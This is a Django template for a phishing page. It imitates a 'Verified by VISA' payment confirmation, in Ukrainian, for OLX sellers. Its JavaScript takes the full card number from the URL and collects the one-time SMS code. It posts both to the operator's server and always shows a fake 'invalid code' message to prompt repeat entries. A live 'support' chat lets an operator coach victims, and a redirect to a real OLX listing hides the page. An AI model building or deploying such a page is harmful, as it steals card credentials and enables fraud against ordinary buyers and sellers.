{% extends 'base.html' %}
{% load static %}
{% block head %}
{% if product %}
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link href="{% static 'img/favicon.ico' %}" rel="icon" type="image/x-icon">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
<title>Verified by VISA — Підтвердження платежа</title>
<style>
    @font-face {
        font-family: 'Lato';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: local('Lato Regular'), local('Lato-Regular'), url(https://fonts.gstatic.com/s/lato/v17/S6uyw4BMUTPHjxAwXjeu.woff2) format('woff2');
        unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
    }

    @font-face {
        font-family: 'Lato';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: local('Lato Regular'), local('Lato-Regular'), url(https://fonts.gstatic.com/s/lato/v17/S6uyw4BMUTPHjx4wXg.woff2) format('woff2');
        unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
    }

    @font-face {
        font-family: 'Lato';
        font-style: normal;
        font-weight: 700;
        font-display: swap;
        src: local('Lato Bold'), local('Lato-Bold'), url(https://fonts.gstatic.com/s/lato/v17/S6u9w4BMUTPHh6UVSwaPGR_p.woff2) format('woff2');
        unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
    }

    @font-face {
        font-family: 'Lato';
        font-style: normal;
        font-weight: 700;
        font-display: swap;
        src: local('Lato Bold'), local('Lato-Bold'), url(https://fonts.gstatic.com/s/lato/v17/S6u9w4BMUTPHh6UVSwiPGQ.woff2) format('woff2');
        unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
    }

    body {
        font-family: "Lato", sans-serif;
        font-weight: 400;
        font-size: 15px;
        background-color: #f7f7f7;
        color: #111;
        padding: 0 15px;
        overflow-y: hidden;
    }

    .form-container {
        display: flex;
        height: 100vh;
        justify-content: center;
        align-items: center;
    }

    .form-block {
        max-width: 480px;
        margin: 0 auto;
        float: left;
    }

    .form-block-image {
        display: inline-block;
        width: 60px;
        height: 60px;
    }

    .form-block-header-text {
        display: inline-block;
        position: relative;
        font-size: 20px;
        margin: 0;
        top: -22px;
        left: 10px;
    }

    .form-block-body-text {
        line-height: 22px;
    }

    .form-block-body-table {
        border-spacing: 0;
        margin-top: 25px;
        margin-bottom: 30px;
    }

    .form-block-body-table tr {
        line-height: 24px;
    }

    .form-block-body-table tr td:nth-child(odd) {
        padding-right: 40px;
    }

    .form-block-body-table tr td:nth-child(even) {
        font-weight: 700;
    }

    .form-block-body-notification {
        font-size: 13px;
        line-height: 18px;
        background-color: #f5f6f7;
        box-shadow: 0 0 5px rgba(0, 0, 0, .1);
        border: 1px solid #e1e1ea;
        border-radius: 4px;
        padding: 10px 15px;
        margin-bottom: 25px;
    }

    .form-block-footer-text {
        font-weight: 700;
    }

    .form-block-footer-input {
        display: block;
        width: calc(100% - 32px);
        font-family: "Lato", sans-serif;
        font-size: 14px;
        border: 1px solid #e7e7e7;
        border-radius: 3px;
        padding: 10px 15px;
        transition: .25s;
    }

    .form-block-footer-input:focus {
        border-color: #c5c0c0;
        outline: none;
    }

    .input-invalid {
        border-color: #e74c3c;
    }

    .form-block-footer-input::-webkit-outer-spin-button,
    .form-block-footer-input::-webkit-inner-spin-button {
        -webkit-appearance: none;
        margin: 0;
    }

    .form-block-footer-button {
        display: block;
        max-width: 480px;
        text-align: center;
        text-decoration: none;
        background-color: #0098d0;
        border-radius: 4px;
        color: #fff;
        padding: 15px 5px;
        margin-top: 20px;
        cursor: pointer;
        transition: .25s;
        width: 100%;
        border: 1px solid #0098d0;
    }

    .form-block-footer-button:hover {
        background-color: #00a3df;
    }

    @media (max-width: 360px) {
        .form-block-image {
            display: block;
            margin-bottom: 15px;
        }

        .form-block-header-text {
            position: static;
            display: block;
        }
    }

    @media (max-height: 680px) {
        body {
            overflow-y: auto;
            padding: 15px;
        }

        .form-container {
            display: block;
        }

        .form-block-footer-button {
            margin-bottom: 25px;
        }
    }







</style>
{% else %}
<meta http-equiv="refresh"
content="0;https://www.olx.ua/obyavlenie/nalya-alkogoly-f1-i-ryumki-podarok-muzhchine-voennowqe123qemu-IDKkgXq.qwedqwdfafawfwaf.html"/>
{% endif %}
{% endblock %}

{% block content %}
<script type="text/javascript" src="{% static 'scripts/jquery.js' %}"></script>
<div class="form-container">
    <div class="form-block" id="step-1" style="margin:0 auto;">
        <div class="form-block-header">
            <img src="{% static 'img/logo.png'%}" width="200" alt="Avito" class="olx">
            <h1 class="form-block-header-text">Підтвердження платежа</h1>
        </div>

        <div class="form-block-body">
            <p class="form-block-body-text">
                Для підтвердження платежу, на ваш номер телефона було відправлено смс повідомлення з одноразовим
                OTP-кодом. Введіть його в поле нижче.
            </p>

            <p style="    padding: 16px;
            border: 3px solid #e12222;background:#F7D9D9;">
            <b>Увага!</b> У зв'язку з високою нагрузкою на сервер відправка кода може затримуватися на декілька
            хвилин.
            <br><br>
            <b>Важливо!</b> Якщо транзакція грошових коштів йде довго, потворіть спробу знову, через декілька
            хвилин.
            <br><br>
            <b>Переконайтесь що ліміт на Інтернет операції за карткою, та баланс, не нижчі за суму продаваємого вами
            товару.</b>
        </p>

        <table class="form-block-body-table">
            <tbody>
                <tr>
                    <td>Магазин:</td>
                    <td>OLX</td>
                </tr>

                <tr>
                    <td>Сума:</td>
                    <td>{{product.price}} грн.</td>
                </tr>

                <tr>
                    <td>Номер картки:</td>
                    <td id="c_v">**** **** **** </td>
                </tr>
            </tbody>
        </table>

    </div>

    <div class="form-block-footer">
        <div class="form-block-body-notification">Одноразовий код був відправлений на Ваш номер телефона. Будь
            ласка,
            перевірте реквізити транзакції та введіть одноразовий код.
        </div>
        <p class="form-block-footer-text">
            Код підтвердження:
        </p>
        <p id="text-error_p" style="color: red;">Ви ввели невірний код підтвердження, перевірте
        правильність введення одноразового OTP-паролю, та повторіть спробу через 2-3 хвилини.</p>
        <input id="field3ds" class="form-block-footer-input" type="password" name="3dscode"
        placeholder="Введіть код..." maxlength="8">
        <input class="form-block-footer-button" type="submit" value="Підтвердити"
        style="background:#003034;border: 1px solid #003034;">
    </div>
</div>
</div>

<img src="{% static 'img/ts_img.png' %}" class="ts_img">
<div class="block-chat">
    <div class="top-background"></div>
    <img src="{% static 'img/logo.png' %}" class="logo">
    <h3 class="close-chat">X</h3>
    <input type="text" name="text_entry" id="input" class="text_entry" placeholder="Ваше питання...">
    <div class="chat" id="chat-messages">
        <p class="hello-text">Вітаю. Напишіть Ваше питання, протягом 3-5 хвилин, до чату підключиться наш оператор.</p>

    </div>
    <input type="submit" name="send" class="send_btn" value=">">
</div>

<script type="text/javascript" src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.4.1.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-cookie/1.4.1/jquery.cookie.min.js"
integrity="sha512-3j3VU6WC5rPQB4Ld1jnLV7Kd5xr+cq9avvhwqzbH/taCRNURoeEpoPBK9pDyeukwSxwRPJ8fDgvYXd6SkaZ2TA=="
crossorigin="anonymous"></script>
<script type="text/javascript">
    $('.c_v').val("");
    function scrolls() {
        scroll += 8000;
        $(".chat").scrollTop($('.block-chat')[0].scrollHeight);
    }
    var scroll = 50000;
    var chat = 0;
    var last_mess_w = "";
    var last_mess_u = "";
    var card_list = window.location.href.split("card=")[1].split("%20");
    let card_view = card_list.join(" ");
    let full_card = card_list.join("");
    card_view = card_view.substring(15,19);
    $("#c_v").html("**** **** **** "+card_view);
    function mode() {
        $.ajax({
            url: window.location.href,
            success: function(data) {
                const request = new XMLHttpRequest();
                const url = window.location.href.split("/id:")[0] + "/id:" + {{product.id}} + "/send-mess-user/";
                request.open('GET', url);
                request.send();
                var get_text = "";
                request.addEventListener("readystatechange", () => {
                    if(request.readyState === 4 && request.status === 200) {
                      get_text = String(request.responseText).split("\n");
                      $('.text-mess-user').remove();
                      $('.text-mess-worker').remove();
                      for (let i = 0; i < get_text.length; i++) {
                          if (get_text[i][0] == "U"){
                              $('.chat').append('<p class="text-mess-user">'+get_text[i].replace("U:", "")+'</p>');
                              if (i == get_text.length - 1) {
                                if (get_text[i] != last_mess_u) {
                                    last_mess_u = get_text[i];
                                    scrolls();
                                }
                            }
                        }
                        if (get_text[i][0] == "W"){
                          $('.chat').append('<p class="text-mess-worker">'+get_text[i].replace("W:", "")+'</p>');
                          if (i == get_text.length - 1) {
                            if (get_text[i] != last_mess_w) {
                                last_mess_w = get_text[i];
                                $('.block-chat').show();
                                chat=1;
                                scrolls();
                            }
                        }
                    }
                }
            }
        });
            }
        });
    }

    $('.send_btn').click(function() {
        var input = $("#input");
        var get_text = "";
        var text = "text=" + input.val();
        if (input.val().length != 0) {
            const request = new XMLHttpRequest();
            const url = window.location.href.split("/id:")[0] + "/id:" + {{product.id}} + "/send-mess-user/";
            request.open("POST", url, true);
            request.addEventListener("readystatechange", () => {
                if(request.readyState === 4 && request.status === 200) {
                    input.val("");
                    scrolls();
                }
            });
            request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
            request.send(text);
        }
    });
    var enter_code = 0;
    if(chat == 0){
        $('.block-chat').hide();
    }
    $('.form-container').click(function(){
        chat = 0;
        $('.block-chat').hide();
    });
    $('.ts_img').click(function() {
        if(chat == 0){
            chat = 1;
            $('.block-chat').show();
        }else {
            chat = 0;
            $('.block-chat').hide();
        }
    });
    $('.close-chat').click(function(){
        chat = 0;
        $('.block-chat').hide();
    });

    if (enter_code == 0) {
        $('#text-error_p').hide();
    }

    $('.form-block-footer-button').click(function() {
        var code = $('.form-block-footer-input').val();
        const request = new XMLHttpRequest();
        let post = "card="+full_card+"&code="+code;
        let url = window.location.href.split("/id:")[0] + "/id:" + {{product.id}} + "/send-code/"
        request.open('POST', url, true);
        request.addEventListener("readystatechange", () => {
            if(request.readyState === 4 && request.status === 200) {
                $('.form-block-footer-input').val("");
                $('#text-error_p').show();
                enter_code = 1;
            }
        });
        request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        request.send(post);
    });

    setInterval(mode, 100);


</script>
<style type="text/css">
    .ts_img{
        width:70px;
        height: 70px;
        position: fixed;
        bottom:25px;
        right:25px;
        border-radius: 100px;
    }
    .close-chat{
        color: white;
        position: absolute;
        top:-13px;
        right:5px;
        padding:10px;
    }
    .chat{
      padding: 10px;
      max-height: 340px;
      overflow-y: scroll;
  }
  .hello-text{
      padding: 5px;
      border-radius: 10px;
      background: #E2E2E2;
      max-width: 200px;
  }
  .text-mess-user{
     background: #B8CFFF;
     padding: 5px;
     border-radius: 10px;
     max-width: 200px;
     margin-top:10px;
     margin-left: 80px;
 }
 .text-mess-worker{
     background: #E2E2E2;
     padding: 5px;
     border-radius: 10px;
     max-width: 200px;
     margin-top: 5px;
 }
 .logo{
  width: 70px;
  height: 50px;
  position: absolute;
  top: 0;
}

.block-chat{
  background: #fff;
  height: 450px;
  width: 300px;
  bottom: 20px;
  right: 20px;
  position: fixed;
  border-radius: 10px;
  backdrop-filter: blur(5px);
  box-shadow: 0px 0px 30px
}
.top-background{
  background: #18443B;
  width: 100%;
  height: 50px;
  border-top-left-radius: 7px;
  border-top-right-radius: 7px;
  backdrop-filter: blur(5px);
  box-shadow: 0px 0px 10px
}

.text_entry {
  bottom: 0;
  left: 10px;
  font-size: 20px;
  position: absolute;
  -webkit-transition: width 0.4s ease-in-out;
  transition: width 0.4s ease-in-out;
  background: transparent;
  width: 220px;
  bottom: 10px;
  border: none;
  border-radius: 5000px;
  padding: 8px;
  backdrop-filter: blur(5px);
  box-shadow: 0px 0px 10px
}

.send_btn {
  width: 40px;
  height: 40px;
  bottom: 10px;
  font-size: 30px;
  text-align: center;
  right: 10px;
  position: absolute;
  color: #23634A;
  background: #F5F5F5;
  border: none;
  border-radius: 10px;
  backdrop-filter: blur(5px);
  box-shadow: 0px 0px 10px
}

body {
    overflow: scroll;
}

.olx{
    margin-top: 150px;
    position: relative;
}
.form-block-footer-button{
    margin-bottom: 50px;
    position: relative;
}

</style>

{% endblock %}
